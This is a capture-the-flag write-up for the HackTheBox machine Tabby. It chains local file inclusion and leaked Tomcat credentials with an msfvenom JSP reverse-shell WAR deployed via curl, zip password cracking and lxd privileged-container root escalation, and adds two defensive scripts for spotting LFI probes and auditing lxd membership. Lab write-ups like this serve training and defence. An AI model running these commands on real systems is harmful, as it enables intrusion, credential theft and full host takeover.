Tabby (HTB) - Write-up

Tabby is a vulnerable machine from HackTheBox that was rated as easy difficulty.

We start with an nmap scan to check what ports are open.

Command: nmap -sC -sV 10.10.10.194

We have only 3 open ports.
  • port 22 SSH
  • port 80 HTTP
  • port 8080 HTTP
We are going to start with port 80, which hosts a normal website. As you can see from the image below, the site uses a hostname that we should add to /etc/hosts.
Let's start a gobuster scan on port 80 to check for some directories.
Command: gobuster dir -u http://megahosting.htb -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-large-directories.txt -x php,txt -t 50
I checked the /files directory, but we can't access it.
If we go to the NEWS tab, it says that there was a data breach. But looking at the URL, there is something interesting: it looks like that statement is a file that is included from somewhere.
This can mean only one thing: Local File Inclusion (LFI). Let's try some basic LFI.
As you can see from the URL, I was able to access the /etc/passwd file. I tried to access auth.log and access.log to check for log poisoning and SSH log poisoning, but no luck.
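From the defender's side, the requests made above leave a clear trace in the web server's access log. The following detector is an added example and is not part of the original write-up: it parses combined-format access log lines, decodes repeated URL encoding in query parameter values, and flags the traversal and absolute-path patterns used for LFI. The log lines are constructed, and the script name (news.php) and parameter name (file) are assumptions, since the write-up does not name them.

```python
"""Flag likely LFI / path traversal attempts in web server access logs.

The sample log lines below are constructed for this example; the parsing
regex assumes the Apache/nginx "combined" log format.
"""
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Combined log format: client, ident, user, [timestamp], "request line", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Files an include-style bug is typically probed with (the ones used in this write-up)
SENSITIVE_PATHS = ("/etc/passwd", "/var/log/", "tomcat-users.xml")


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo repeated URL encoding (e.g. %252e%252e -> %2e%2e -> ..)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_lfi_attempt(target: str) -> bool:
    """True if any query parameter value looks like traversal or a sensitive path.

    Heuristic: a value containing '../', starting with '/', carrying a null byte,
    or naming one of SENSITIVE_PATHS. parse_qsl already decodes one layer of
    percent-encoding; fully_decode handles double/triple encoding on top.
    """
    parts = urlsplit(target)
    for _, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_decode(raw).replace("\\", "/")
        if "../" in value or value.startswith("/") or "\x00" in value:
            return True
        if any(p in value for p in SENSITIVE_PATHS):
            return True
    return False


def scan_access_log(lines):
    """Return (ip, target, status) tuples for requests that look like LFI probes."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        if is_lfi_attempt(m["target"]):
            hits.append((m["ip"], m["target"], int(m["status"])))
    return hits


# Constructed sample lines (not real traffic): one benign include, three probes,
# one unrelated request. Hostname, script and parameter names are assumptions.
SAMPLE_LOG = [
    '10.10.14.5 - - [06/Nov/2020:10:55:01 +0000] "GET /news.php?file=statement HTTP/1.1" 200 1523',
    '10.10.14.5 - - [06/Nov/2020:10:55:09 +0000] "GET /news.php?file=../../../../etc/passwd HTTP/1.1" 200 2412',
    '10.10.14.5 - - [06/Nov/2020:10:55:20 +0000] "GET /news.php?file=..%2f..%2f..%2fvar%2flog%2fauth.log HTTP/1.1" 200 0',
    '10.10.14.5 - - [06/Nov/2020:10:56:02 +0000] "GET /news.php?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 2412',
    '10.10.14.7 - - [06/Nov/2020:10:57:14 +0000] "GET /index.php HTTP/1.1" 200 3210',
]

if __name__ == "__main__":
    for ip, target, status in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {status} {target}")
```

The double-encoded line is the one worth noticing: a rule that matches only on the literal string "../" misses it, which is why the parameter value is decoded until it stops changing before the patterns are applied. A 200 status on such a request (rather than 404 or 403) is the signal that the include actually succeeded.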

We know from the nmap scan that there is another HTTP port, which is running Tomcat. Let's check that.
I tried to access the manager webapp and the host-manager webapp, but I was asked for credentials that I don't have. I also tried the default credentials, but no luck.
We know that we have LFI, so let's use it to read the Tomcat configuration file.
Note: Check this link to find where the Tomcat directory is located on Debian systems: https://packages.debian.org/sid/all/tomcat9/filelist

If we access the /usr/share/tomcat9/etc/tomcat-users.xml file via the LFI (open the page source to read the content of the file, or do it in Burp Suite), we can find some credentials.
With the credentials that we've found, we can access the host-manager webapp.
Now it's time to upload a reverse shell, and to do that we need to use curl. Check this link on how to do that with curl: https://gist.github.com/pete911/6111816
But first we need to create a reverse shell using msfvenom.
Command: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP> LPORT=<Listening Port> -f war > lol.war
Now we use curl to upload our file.
Command: curl -u 'tomcat':'$3****************' -T shell.war 'http://megahosting:8080/manager/text/deploy?path=/shell.war'
All we have to do now is start a netcat listener and access the file that we uploaded. Our uploaded file can be found at: http://megahosting:8080/<your shell's name>/

And we have a shell as user tomcat.
We know from the gobuster result that there is a directory named /files. Let's find it and see what is inside.
As you can see from the image, I found the directory in /var/www/html/. Inside it there was a zip file that I transferred to my machine. The easiest way to transfer the file is to access it from the browser like so: megahosting.htb/files/16162020_backup.zip.

I tried to open the zip file, but it was password protected, so I had to use fcrackzip to crack the password.
Command: fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' 16162020_backup.zip
Although we can now unzip the file, there is nothing interesting in there. The password that we just got is user ash's password.
Shell as ash
We can see that user ash is part of the lxd group. We can use this to escalate privileges to root.
First we have to initialise lxd.
Command: lxd init
On our own machine we need to build the Alpine image. Clone the image builder:
Command: git clone https://github.com/saghul/lxd-alpine-builder.git
Now go inside the cloned directory to build the image.
Command: sudo ./build-alpine
Now send the compiled image to the target machine.
Add the image to lxd.
Command: lxc image import ./alpine-v3.12-x86_64-20201106_1055.tar.gz --alias myimage
Note: If the import fails, move the Alpine image to /dev/shm.

List the lxd images.
Command: lxc image list
Now execute the following commands to get a shell as root.
Commands:
  1. lxc init myimage ignite -c security.privileged=true
  2. lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
  3. lxc start ignite
  4. lxc exec ignite /bin/sh
Shell as root
We are still inside the container. To access the host machine's files, go to /mnt/root.
Now you can read the user and the root flag!
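Two of the weaknesses chained above are cheap to audit on a host before anyone chains them: the Tomcat credentials file being readable by the web application's user (and therefore through the LFI), and a non-root user sitting in the lxd group, which is effectively root on a default install because of the privileged-container trick shown here. The script below is an added example, not part of the original write-up: it parses /etc/group text for members of root-equivalent groups and checks a secrets file's permission bits against a 0640 ceiling. The /etc/group content is constructed, the temporary files stand in for the real tomcat-users.xml, and the set of watched groups is an assumption you would extend for your own environment.

```python
"""Defender-side audit for two findings from this write-up:
non-root members of the lxd group, and an over-permissive tomcat-users.xml.

The /etc/group sample and the files checked below are constructed for the
example; parse_group_file() works unchanged on a real /etc/group.
"""
import os
import stat
import tempfile

# Groups whose membership is effectively root on a default Ubuntu/Debian host.
# Assumption: only lxd is watched here; extend the set for your environment.
ROOT_EQUIVALENT_GROUPS = {"lxd"}


def parse_group_file(text: str) -> dict:
    """Map group name -> set of supplementary members from /etc/group text."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, _gid, members = line.split(":", 3)
        groups[name] = {m for m in members.split(",") if m}
    return groups


def risky_group_members(group_text: str, watched=ROOT_EQUIVALENT_GROUPS):
    """Return sorted (user, group) pairs for non-root users in watched groups."""
    groups = parse_group_file(group_text)
    findings = []
    for g in sorted(watched):
        for user in sorted(groups.get(g, ())):
            if user != "root":
                findings.append((user, g))
    return findings


def check_secret_file_mode(path: str, max_mode: int = 0o640) -> list:
    """Return a list of problems with a secrets file's permission bits.

    tomcat-users.xml should be no looser than 0640 (root:tomcat is the usual
    owner/group); any bit outside max_mode, world-read included, is reported.
    """
    problems = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    extra = mode & ~max_mode
    if extra:
        problems.append(f"{path}: mode {mode:04o} has bits {extra:04o} beyond {max_mode:04o}")
    return problems


def demo_file_modes() -> dict:
    """Create two stand-in copies of tomcat-users.xml, one at 0644 and one at
    0640, and return the problems found for each (constructed, not the real file)."""
    results = {}
    for label, mode in (("world-readable", 0o644), ("restricted", 0o640)):
        fd, path = tempfile.mkstemp(prefix="tomcat-users-", suffix=".xml")
        os.write(fd, b"<tomcat-users/>")
        os.close(fd)
        os.chmod(path, mode)
        try:
            results[label] = check_secret_file_mode(path)
        finally:
            os.unlink(path)
    return results


# Constructed /etc/group excerpt: 'ash' is in lxd, as found on the box.
SAMPLE_GROUP = """root:x:0:
sudo:x:27:
lxd:x:116:ash
tomcat:x:997:
ash:x:1000:
"""

if __name__ == "__main__":
    for user, group in risky_group_members(SAMPLE_GROUP):
        print(f"FINDING: user {user} is in root-equivalent group {group}")
    for label, problems in demo_file_modes().items():
        print(f"{label}: {problems or 'ok'}")
```

Run against a real host, replace SAMPLE_GROUP with the contents of /etc/group and point check_secret_file_mode() at the actual tomcat-users.xml path from the Debian file list linked above. Removing ash from lxd (or keeping lxd membership for administrators only) closes the root path used in this write-up; tightening the credentials file does not stop the LFI itself, but it stops the LFI from yielding the Tomcat password.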





